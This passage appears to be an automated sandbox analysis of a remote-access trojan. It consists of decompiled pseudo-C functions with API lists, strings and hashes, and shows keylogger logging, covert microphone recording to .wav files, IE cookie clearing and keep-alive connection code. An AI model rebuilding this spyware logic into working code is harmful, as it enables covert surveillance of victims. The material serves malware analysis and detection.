                      							_t101 = E0077F98C(_t78, _v272);
                      							__eflags = _t101;
                      							if(__eflags != 0) {
                      								_t50 = E00779895(__eflags,  &_v276, _t101, _v272, _t77);
                      								__eflags = _t50;
                      								if(_t50 == 0) {
                      									E007801F5(0);
                      									_t89 = _t101;
                      								} else {
                      									_push(_t101);
                      									goto L25;
                      								}
                      							} else {
                      								_push(0);
                      								L25:
                      								E007801F5();
                      							}
                      						}
                      					} else {
                      						_t89 =  &_v268;
                      					}
                      					asm("sbb esi, esi");
                      					_t100 =  ~(_t89 -  &_v268) & _t89;
                      					__eflags = _t89;
                      					if(__eflags == 0) {
                      						L33:
                      						E00782E63(_t77, _t89, _t100, __eflags);
                      					} else {
                      						__eflags =  *_t89;
                      						if(__eflags == 0) {
                      							goto L33;
                      						} else {
                      							_push(_t89);
                      							E00782C8E(_t77, _t89, _t100, __eflags);
                      						}
                      					}
                      					E007801F5(_t100);
                      					__eflags = _v12 ^ _t106;
                      					return E0076FD1B(_v12 ^ _t106);
                      				} else {
                      					_t54 = E007828D3( &_v12);
                      					_pop(_t78);
                      					if(_t54 != 0) {
                      						goto L19;
                      					} else {
                      						_t56 = E007828FF( &_v16);
                      						_pop(_t78);
                      						if(_t56 != 0) {
                      							goto L19;
                      						} else {
                      							E007801F5( *0x7ab740);
                      							 *0x7ab740 = 0;
                      							 *_t107 = 0x7ab750;
                      							if(GetTimeZoneInformation(??) != 0xffffffff) {
                      								_t85 =  *0x7ab750 * 0x3c;
                      								_t87 =  *0x7ab7a4; // 0x0
                      								_push(__edi);
                      								 *0x7ab748 = 1;
                      								_v8 = _t85;
                      								_t116 =  *0x7ab796; // 0x0
                      								if(_t116 != 0) {
                      									_v8 = _t85 + _t87 * 0x3c;
                      								}
                      								_t118 =  *0x7ab7ea; // 0x0
                      								if(_t118 == 0) {
                      									L9:
                      									_v12 = 0;
                      									_v16 = 0;
                      								} else {
                      									_t71 =  *0x7ab7f8; // 0x0
                      									if(_t71 == 0) {
                      										goto L9;
                      									} else {
                      										_v12 = 1;
                      										_v16 = (_t71 - _t87) * 0x3c;
                      									}
                      								}
                      								_t93 = E0077F55B(0, _t87);
                      								if(WideCharToMultiByte(_t93, 0, 0x7ab754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                      									 *( *_t96) = 0;
                      								} else {
                      									( *_t96)[0x3f] = 0;
                      								}
                      								if(WideCharToMultiByte(_t93, 0, 0x7ab7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                      									 *(_t96[1]) = 0;
                      								} else {
                      									_t96[1][0x3f] = 0;
                      								}
                      							}
                      							 *(E007828C7()) = _v8;
                      							 *(E007828BB()) = _v12;
                      							_t61 = E007828C1();
                      							 *_t61 = _v16;
                      							return _t61;
                      						}
                      					}
                      				}
                      			}

                      APIs
                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0079913C), ref: 00782ECD
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,007AB754,000000FF,00000000,0000003F,00000000,?,?), ref: 00782F45
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,007AB7A8,000000FF,?,0000003F,00000000,?), ref: 00782F72
                      • _free.LIBCMT ref: 00782EBB
                        • Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
                        • Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D
                      • _free.LIBCMT ref: 00783087
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                      • String ID: ~0x
                      • API String ID: 1286116820-548819893
                      • Opcode ID: f6d5d5ca5696d76562c9d0a12dc72ada18a7aa740cc74ed90183dd24e20dc136
                      • Instruction ID: fafdb63fa0b6e86ea04e213d32056270a19bf137990fe5a889b1363ca16558c9
                      • Opcode Fuzzy Hash: f6d5d5ca5696d76562c9d0a12dc72ada18a7aa740cc74ed90183dd24e20dc136
                      • Instruction Fuzzy Hash: 5D51D871D40209EFCB10FF68DC859BEB7BCEF81761B10426AE514A7192EB789E42CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E00744FAD(void* __edi, intOrPtr _a4) {
                      				struct _SYSTEMTIME _v24;
                      				char _v48;
                      				char _v72;
                      				void* __ebx;
                      				intOrPtr _t85;
                      				void* _t86;
                      				void* _t92;
                      
                      				_t84 = __edi;
                      				if( *0x7ac7d0 == 0) {
                      					__eflags = 0;
                      					return 0;
                      				}
                      				_t85 = _a4;
                      				if( *0x7abb03 == 0) {
                      					L7:
                      					 *0x7ac7e0 =  *0x7ac7e0 & 0x00000000;
                      					 *0x7ac7e5 = 1;
                      					 *0x7ac7dc = _t85;
                      					return 1;
                      				}
                      				_t91 =  *0x7ac7e4;
                      				_t62 = "%02i:%02i:%02i:%03i [Info] ";
                      				if( *0x7ac7e4 != 0) {
                      					GetLocalTime( &_v24);
                      					_push(_v24.wMilliseconds & 0x0000ffff);
                      					_push(_v24.wSecond & 0x0000ffff);
                      					_push(_v24.wMinute & 0x0000ffff);
                      					E0074482E(_t91, E00741F95(E00745343(_t62,  &_v48, E00742084("%02i:%02i:%02i:%03i [Info] ",  &_v72, _t62), __edi, _t91, "Connection KeepAlive enabled\n")), _v24.wHour & 0x0000ffff);
                      					E00741FC7();
                      					E00741FC7();
                      					_push(_t85);
                      					_push(_v24.wMilliseconds & 0x0000ffff);
                      					_push(_v24.wSecond & 0x0000ffff);
                      					_push(_v24.wMinute & 0x0000ffff);
                      					E0074482E(_t91, E00741F95(E00745343(_t62,  &_v72, E00742084(_t62,  &_v48, _t62), __edi, _t91, "Connection KeepAlive timeout: %i\n")), _v24.wHour & 0x0000ffff);
                      					_t86 = _t86 + 0x2c;
                      					E00741FC7();
                      					E00741FC7();
                      					 *0x7ac7e4 = 0;
                      				}
                      				_t92 =  *0x7ac7dc - _t85; // 0x0
                      				if(_t92 != 0) {
                      					_t93 =  *0x7ac7e5;
                      					if( *0x7ac7e5 != 0) {
                      						GetLocalTime( &_v24);
                      						_push(_t85);
                      						_push(_v24.wMilliseconds & 0x0000ffff);
                      						_push(_v24.wSecond & 0x0000ffff);
                      						_push(_v24.wMinute & 0x0000ffff);
                      						E0074482E(_t93, E00741F95(E00745343(_t62,  &_v72, E00742084(_t62,  &_v48, _t62), _t84, _t93, "KeepAlive timeout changed to %i\n")), _v24.wHour & 0x0000ffff);
                      						E00741FC7();
                      						E00741FC7();
                      					}
                      				}
                      				goto L7;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: LocalTime
                      • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
                      • API String ID: 481472006-2341810981
                      • Opcode ID: c385bb1d0960d36e16f3ac942fdc47f1dd8edc20a27d0e8d284e53cfeb8dd528
                      • Instruction ID: e7d3e957f500ebaf18118955854596f5b160d7b9ffbaf1909dd56484fd23f31b
                      • Opcode Fuzzy Hash: c385bb1d0960d36e16f3ac942fdc47f1dd8edc20a27d0e8d284e53cfeb8dd528
                      • Instruction Fuzzy Hash: 684195A2C01258FACF15FBB5DC09AFEB7BCAB0A304F404456F441E6092EB3C5A85D764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00744E9A(void* __ecx, intOrPtr _a4, char _a8) {
                      				struct _SYSTEMTIME _v20;
                      				char _v44;
                      				char _v68;
                      				void* __ebx;
                      				void* __edi;
                      				intOrPtr _t66;
                      				void* _t68;
                      
                      				_t68 = __ecx;
                      				if( *((char*)(__ecx + 0x50)) != 0) {
                      					__eflags = 0;
                      					return 0;
                      				}
                      				_t66 = _a4;
                      				if(_a8 != 0) {
                      					__eflags =  *0x7abb03;
                      					if(__eflags != 0) {
                      						GetLocalTime( &_v20);
                      						_push(_v20.wMilliseconds & 0x0000ffff);
                      						_t50 = "%02i:%02i:%02i:%03i [Info] ";
                      						_push(_v20.wSecond & 0x0000ffff);
                      						_push(_v20.wMinute & 0x0000ffff);
                      						E0074482E(__eflags, E00741F95(E00745343(_t50,  &_v44, E00742084("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), _t66, __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
                      						E00741FC7();
                      						E00741FC7();
                      						_push(_t66);
                      						_push(_v20.wMilliseconds & 0x0000ffff);
                      						_push(_v20.wSecond & 0x0000ffff);
                      						_push(_v20.wMinute & 0x0000ffff);
                      						E0074482E(__eflags, E00741F95(E00745343(_t50,  &_v68, E00742084(_t50,  &_v44, _t50), _t66, __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
                      						E00741FC7();
                      						E00741FC7();
                      					}
                      				} else {
                      					 *((char*)(__ecx + 0x64)) = 1;
                      				}
                      				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
                      				 *((char*)(_t68 + 0x50)) = 1;
                      				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
                      				CreateThread(0, 0, E0074518A, _t68, 0, 0);
                      				return 1;
                      			}

                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 00744ED2
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00744F85
                      • CreateThread.KERNEL32 ref: 00744F98
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Create$EventLocalThreadTime
                      • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                      • API String ID: 2532271599-119634454
                      • Opcode ID: 8ee760cb51e2548d8cf698a2bb99ee77555a9cdafb487fbccded744d68d8e1b0
                      • Instruction ID: 8839a63a40ea3f829f2471e74f16db0bb127d6a6ee00dfe746f768c8e566295d
                      • Opcode Fuzzy Hash: 8ee760cb51e2548d8cf698a2bb99ee77555a9cdafb487fbccded744d68d8e1b0
                      • Instruction Fuzzy Hash: 2B314161900254BACB10EBA5CC0DEBFBBBCBF56715F44045AF441A2192EB7C9A86D770
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00741CEF(void* __ebx, void* __edi, intOrPtr _a8) {
                      				char _v84;
                      				char _v112;
                      				void* _v116;
                      				char _v136;
                      				void* _v140;
                      				char _v160;
                      				void* _v164;
                      				char _v184;
                      				void* _v188;
                      				char _v204;
                      				char _v208;
                      				void* _v212;
                      				char _v228;
                      				char _v232;
                      				char _v236;
                      				void* __esi;
                      				void* _t29;
                      				intOrPtr _t43;
                      				void* _t75;
                      
                      				_t47 = __ebx;
                      				_push(_t75);
                      				E00741F6D(__ebx,  &_v228);
                      				_t82 = _a8 - 0x3c0;
                      				if(_a8 == 0x3c0) {
                      					E007416F0();
                      					E007756B9( &_v84, 0x50, "%Y-%m-%d %H.%M", E007416E8());
                      					E00742084(__ebx,  &_v204,  &_v84);
                      					_t29 = E007572DA( &_v112,  &_v208);
                      					E00741EFA( &_v232, _t31, _t75, E007430A6(_t47,  &_v184, E00743030( &_v160, E00742FFA(__ebx,  &_v136, 0x7ac0e0, 0x5c), _t29), __edi, _t82, L".wav"));
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      					E00741FC7();
                      					E00741A64(E00741EEB( &_v236), 0x7aba78);
                      					waveInUnprepareHeader( *0x7abab0, 0x7aba78, 0x20);
                      					0x7aba78->lpData = E00741F95(0x7ac0f8);
                      					_t43 =  *0x7abab4; // 0x0
                      					 *0x7aba7c = _t43;
                      					 *0x7aba80 = 0;
                      					 *0x7aba84 = 0;
                      					 *0x7aba88 = 0;
                      					 *0x7aba8c = 0;
                      					waveInPrepareHeader( *0x7abab0, 0x7aba78, 0x20);
                      					waveInAddBuffer( *0x7abab0, 0x7aba78, 0x20);
                      				}
                      				return E00741EF0();
                      			}

                      APIs
                      • _strftime.LIBCMT ref: 00741D34
                        • Part of subcall function 00741A64: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741ACC
                      • waveInUnprepareHeader.WINMM(007ABA78,00000020,00000000,?), ref: 00741DE6
                      • waveInPrepareHeader.WINMM(007ABA78,00000020), ref: 00741E24
                      • waveInAddBuffer.WINMM(007ABA78,00000020), ref: 00741E33
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                      • String ID: %Y-%m-%d %H.%M$.wav
                      • API String ID: 3809562944-3597965672
                      • Opcode ID: f91f8fedf3b28d16a0f63b783aa9f9e85d97f5ca511f9dee1abcd9d43cbe5480
                      • Instruction ID: dbf7b5710d2e340e2325ad077d685b11f11dbeafb6b1178a6a8e7b24ca9c4881
                      • Opcode Fuzzy Hash: f91f8fedf3b28d16a0f63b783aa9f9e85d97f5ca511f9dee1abcd9d43cbe5480
                      • Instruction Fuzzy Hash: C831A231514340DBC314FB20DC4AA9F77A9AB95301F80C529F55A865A2EF385A4ACB56
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E0074A409(void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v340;
                      				void* __ebx;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t17;
                      				void* _t20;
                      				int _t34;
                      				void* _t40;
                      				void* _t41;
                      				char* _t42;
                      				void* _t48;
                      				char* _t55;
                      				void* _t59;
                      				void* _t61;
                      				void* _t62;
                      
                      				_t42 =  &_v28;
                      				E007420D5(_t40, _t42);
                      				_push(_t42);
                      				_t41 = 0;
                      				_t17 = E007508E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                      				_t62 = _t61 + 0xc;
                      				E00741FD1( &_v28, 0x80000001, _t59, _t17);
                      				E00741FC7();
                      				_t58 = 0x79f6bc;
                      				_t20 = E00745A6F(0x79f6bc);
                      				_t66 = _t20;
                      				if(_t20 == 0) {
                      					ExpandEnvironmentStringsA(E00741F95( &_v28),  &_v340, 0x104);
                      					__eflags = PathFileExistsA( &_v340);
                      					if(__eflags == 0) {
                      						goto L1;
                      					} else {
                      						E00742084(0,  &_v52,  &_v340);
                      						_t58 =  &_v52;
                      						_t34 = E00757754(E00741EEB(E007572DA( &_v76,  &_v52)));
                      						E00741EF0();
                      						_t55 =  &_v52;
                      						E00741FC7();
                      						__eflags = _t34;
                      						if(__eflags == 0) {
                      							_push(_t55);
                      							_push(_t55);
                      							__eflags = E0074A713();
                      							if(__eflags != 0) {
                      								_t41 = 1;
                      								E00742084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
                      								E0074A6EF(1,  &_v52, __eflags);
                      								goto L8;
                      							}
                      						} else {
                      							_t48 = _t62 - 0x18;
                      							_push("\n[IE cookies cleared!]");
                      							goto L2;
                      						}
                      					}
                      				} else {
                      					L1:
                      					_t48 = _t62 - 0x18;
                      					_push("\n[IE cookies not found]");
                      					L2:
                      					E00742084(_t41, _t48);
                      					E0074A6EF(_t41, _t58, _t66);
                      					_t41 = 1;
                      					L8:
                      				}
                      				E00741FC7();
                      				return _t41;
                      			}

                      APIs
                        • Part of subcall function 007508E2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00750904
                        • Part of subcall function 007508E2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00750923
                        • Part of subcall function 007508E2: RegCloseKey.ADVAPI32(?), ref: 0075092C
                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0074A48B
                      • PathFileExistsA.SHLWAPI(?), ref: 0074A498
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                      • API String ID: 1133728706-4073444585
                      • Opcode ID: 4c4cf014e7c24d159fe27f9ebefa4c85a95b0c88ef7e40a373cdfd806efa05cc
                      • Instruction ID: ca58edb71387a39e9d1b840c885d1f44f6acd3020ce8c08bfbe0b33c3a6de410
                      • Opcode Fuzzy Hash: 4c4cf014e7c24d159fe27f9ebefa4c85a95b0c88ef7e40a373cdfd806efa05cc
                      • Instruction Fuzzy Hash: 34217C71A40119EACB14F7F4DC5ECEE7768AF15300F840528F901A7192FF6DAA5AC692
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E007901D3(char* _a4, short* _a8) {
                      				int _v8;
                      				void* __ecx;
                      				void* __esi;
                      				short* _t10;
                      				short* _t14;
                      				int _t15;
                      				short* _t16;
                      				void* _t26;
                      				int _t27;
                      				void* _t29;
                      				short* _t35;
                      				short* _t39;
                      				short* _t40;
                      
                      				_push(_t29);
                      				if(_a4 != 0) {
                      					_t39 = _a8;
                      					__eflags = _t39;
                      					if(__eflags != 0) {
                      						_push(_t26);
                      						E007820AE(_t29, _t39, __eflags);
                      						asm("sbb ebx, ebx");
                      						_t35 = 0;
                      						_t27 = _t26 + 1;
                      						 *_t39 = 0;
                      						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                      						_v8 = _t10;
                      						__eflags = _t10;
                      						if(_t10 != 0) {
                      							_t40 = E0077F98C(_t29, _t10 + _t10);
                      							__eflags = _t40;
                      							if(_t40 != 0) {
                      								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                      								__eflags = _t15;
                      								if(_t15 != 0) {
                      									_t16 = _t40;
                      									_t40 = 0;
                      									_t35 = 1;
                      									__eflags = 1;
                      									 *_a8 = _t16;
                      								} else {
                      									E0077A4CE(GetLastError());
                      								}
                      							}
                      							E007801F5(_t40);
                      							_t14 = _t35;
                      						} else {
                      							E0077A4CE(GetLastError());
                      							_t14 = 0;
                      						}
                      					} else {
                      						 *((intOrPtr*)(E0077A504())) = 0x16;
                      						E0077695D();
                      						_t14 = 0;
                      					}
                      					return _t14;
                      				}
                      				 *((intOrPtr*)(E0077A504())) = 0x16;
                      				E0077695D();
                      				return 0;
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aafd695f09b2db8205d0f68b7308028616c589f39c20d6d88540a794455a8e9a
                      • Instruction ID: 0e917d9889b0a7ef9db54e306208b2ee8283e37ceb1a3d593d3c0554bcc0e839
                      • Opcode Fuzzy Hash: aafd695f09b2db8205d0f68b7308028616c589f39c20d6d88540a794455a8e9a
                      • Instruction Fuzzy Hash: FE11E472514255FFDF206F75AC0D92F7B68FF867A07108665F829C7241DA3C8801C6B0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E0074E7E5(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                      				void* _v8;
                      				char _v12;
                      				char _v24;
                      				void* __esi;
                      				intOrPtr _t40;
                      				void* _t48;
                      				intOrPtr* _t51;
                      
                      				E00770058( &_v12, 0);
                      				_t48 =  *0x7adb84;
                      				_v8 = _t48;
                      				_t51 = E0074BA23(_a4, E0074B94C(0x7ab130));
                      				if(_t51 != 0) {
                      					L5:
                      					E007700B0( &_v12);
                      					return _t51;
                      				} else {
                      					if(_t48 == 0) {
                      						__eflags = E0074BB55(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                      						if(__eflags == 0) {
                      							E0074B812( &_v24);
                      							E0077205A( &_v24, 0x7a864c);
                      							asm("int3");
                      							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                      							__eflags =  *0x7adb78 -  *((intOrPtr*)(_t40 + 4));
                      							if( *0x7adb78 >  *((intOrPtr*)(_t40 + 4))) {
                      								_push(_t51);
                      								E0076F114(0x7adb78);
                      								__eflags =  *0x7adb78 - 0xffffffff;
                      								if( *0x7adb78 == 0xffffffff) {
                      									E0074EB9C();
                      									E0076F49E(__eflags, 0x792871);
                      									E0076F0D5(0x7adb78, 0x7adb78);
                      								}
                      							}
                      							return 0x7adb7c;
                      						} else {
                      							_t51 = _v8;
                      							 *0x7adb84 = _t51;
                      							 *((intOrPtr*)( *_t51 + 4))();
                      							E00770269(__eflags, _t51);
                      							goto L5;
                      						}
                      					} else {
                      						_t51 = _t48;
                      						goto L5;
                      					}
                      				}
                      			}

                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0074E7F2
                      • int.LIBCPMT ref: 0074E805
                        • Part of subcall function 0074B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0074B95D
                        • Part of subcall function 0074B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0074B977
                      • std::locale::_Getfacet.LIBCPMT ref: 0074E80E
                      • std::_Facet_Register.LIBCPMT ref: 0074E845
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0074E84E
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0074E86C
                      • __Init_thread_footer.LIBCMT ref: 0074E8AD
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                      • String ID:
                      • API String ID: 2409581025-0
                      • Opcode ID: 437cfd0b91bd40380e5440fa223becc3d7d83d2b89b8b8c7b1823dbfcb0d622c
                      • Instruction ID: e821397bce36c0c2f41de86e705c88d526ab89cf1277791fe200b0c2aeff26cf
                      • Opcode Fuzzy Hash: 437cfd0b91bd40380e5440fa223becc3d7d83d2b89b8b8c7b1823dbfcb0d622c
                      • Instruction Fuzzy Hash: CE21F676900114DFCB14FB68D84ADAD77ACAF81330B21416AF805A7692DF3C9D0187E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 63%
                      			E00749634(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                      				struct _SYSTEMTIME _v20;
                      				char _v44;
                      				char _v68;
                      				void* __edi;
                      				void* __esi;
                      				WCHAR* _t33;
                      				void* _t65;
                      				void* _t67;
                      				void* _t70;
                      
                      				_t70 = __eflags;
                      				_t42 = __ebx;
                      				_t67 = __ecx;
                      				GetLocalTime( &_v20);
                      				E00741EFA( &_a4, _t26, _t67, E007430A6(__ebx,  &_v44, E00749E69( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
                      				E00741EF0();
                      				E00741EF0();
                      				_push(0x64 + E00742489() * 2);
                      				_t33 = E007794F6( &_a4);
                      				_t66 = _t33;
                      				_push(_v20.wSecond & 0x0000ffff);
                      				_push(_v20.wMinute & 0x0000ffff);
                      				_push(_v20.wHour & 0x0000ffff);
                      				_push(_v20.wDay & 0x0000ffff);
                      				_push(_v20.wMonth & 0x0000ffff);
                      				_push(_v20.wYear & 0x0000ffff);
                      				wsprintfW(_t33, E00741EEB( &_a4));
                      				if( *((char*)(_t67 + 0x49)) != 0) {
                      					_t19 = _t67 + 4; // 0x7ac354
                      					E0074766C(__ebx, _t19, _t66, _t66);
                      				}
                      				if( *((char*)(_t67 + 0x4a)) != 0) {
                      					_t21 = _t67 + 0x1c; // 0x7ac36c
                      					E0074766C(_t42, _t21, _t66, _t66);
                      					_t22 = _t67 + 0x3c; // 0x0
                      					SetEvent( *_t22);
                      				}
                      				L007794F1(_t66);
                      				return E00741EF0();
                      			}

                      APIs
                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
                        • Part of subcall function 00749E69: char_traits.LIBCPMT ref: 00749E79
                      • wsprintfW.USER32 ref: 007496C3
                      • SetEvent.KERNEL32(00000000,00000000), ref: 007496ED
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: EventLocalTimechar_traitswsprintf
                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                      • API String ID: 3003339404-248792730
                      • Opcode ID: 1c8ef80517210609164a03fe910631969af0bb15b719a2d8a2c33d15d8bd342f
                      • Instruction ID: 396380f95065da201bd9bf8aa5354f72b9f6ffab07a8408de1efa38508f6f3d1
                      • Opcode Fuzzy Hash: 1c8ef80517210609164a03fe910631969af0bb15b719a2d8a2c33d15d8bd342f
                      • Instruction Fuzzy Hash: 83217176400118AACB28FBA8EC598FF77B9AF04751B40811EF94652191EF7C6A86C764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 45%
                      			E00756F19(void* __edx) {
                      				intOrPtr _v8;
                      				char _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				void* _t25;
                      				void* _t26;
                      				void* _t27;
                      				void* _t29;
                      				void* _t30;
                      				void* _t40;
                      				intOrPtr* _t44;
                      
                      				_t40 = __edx;
                      				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                      				 *_t44( &_v52,  &_v28,  &_v20);
                      				Sleep(0x3e8);
                      				 *_t44( &_v44,  &_v36,  &_v12);
                      				_t25 = E00756FCE( &_v12);
                      				_t26 = E00756FCE( &_v20);
                      				asm("sbb ebx, edx");
                      				_t27 = E00756FCE( &_v28);
                      				asm("sbb ebx, edx");
                      				_v8 = _t25 - _t26 - _t27 + E00756FCE( &_v36);
                      				asm("adc ebx, edx");
                      				_t29 = E00756FCE( &_v44);
                      				asm("sbb esi, edx");
                      				_t30 = E00756FCE( &_v52);
                      				asm("adc esi, edx");
                      				return E00790880(E00790840(_t25 - _t26 - _t27 + E00756FCE( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,007ABACC,?,?,?,?,?,?,?,?,?,?,?,007535C0), ref: 00756F2C
                      • GetProcAddress.KERNEL32(00000000), ref: 00756F33
                      • Sleep.KERNEL32(000003E8,?,007ABACC,?,?,?,?,?,?,?,?,?,?,?,007535C0,00000095), ref: 00756F4E
                      • __aulldiv.LIBCMT ref: 00756FC2
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressHandleModuleProcSleep__aulldiv
                      • String ID: GetSystemTimes$kernel32.dll
                      • API String ID: 482274533-1354958348
                      • Opcode ID: 5968120cd0a4291298f258f0c74a27b5dbe033a07af45deffed6d0fd20f7c9aa
                      • Instruction ID: e787c5735541893d2e6c0bd1c0766e2751419953fb4b782a1f91551233a06eba
                      • Opcode Fuzzy Hash: 5968120cd0a4291298f258f0c74a27b5dbe033a07af45deffed6d0fd20f7c9aa
                      • Instruction Fuzzy Hash: EF114577D00218AADB14A7F4DC89DEF7B7CAB44751F040A26F905E3181ED785A08C6E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00757947(void* __ecx, long __edx, char _a4, long _a8) {
                      				void* _v8;
                      				long _v12;
                      				long _t10;
                      				long _t11;
                      				struct _OVERLAPPED* _t16;
                      				struct _OVERLAPPED* _t21;
                      				long _t24;
                      				long _t27;
                      				void* _t30;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t21 = 0;
                      				_v8 = __ecx;
                      				_t27 = __edx;
                      				_t10 = _a8;
                      				if(_t10 == 0) {
                      					_t11 = 0x40000000;
                      					_t24 = 2;
                      				} else {
                      					if(_t10 != 1) {
                      						_t11 = _a8;
                      						_t24 = _a8;
                      					} else {
                      						_t11 = 4;
                      						_t24 = _t11;
                      					}
                      				}
                      				_t5 =  &_a4; // 0x745d69
                      				_t30 = CreateFileW( *_t5, _t11, _t21, _t21, _t24, 0x80, _t21);
                      				if(_t30 != 0xffffffff) {
